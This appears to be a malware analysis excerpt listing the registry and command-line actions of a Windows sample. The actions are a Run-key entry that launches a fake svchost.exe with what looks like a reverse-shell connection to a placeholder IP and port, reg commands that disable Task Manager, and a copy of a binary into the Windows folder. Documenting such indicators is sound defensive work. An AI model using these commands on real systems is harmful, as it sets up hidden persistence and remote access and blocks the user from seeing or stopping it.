Technical information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'svchost.exe' = '%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e'
- Task Manager (Taskmgr)
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /d "%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e
- '<SYSTEM32>\cmd.exe' /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c "reg ADD HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /d "%WINDIR%\svchost.exe -d 123.123.123.123 1234 -e"
- '<SYSTEM32>\cmd.exe' /c "copy setup-1.bin %WINDIR%\ "
- '<SYSTEM32>\cmd.exe' /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /f "
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\Currentversion\run /v svchost.exe /f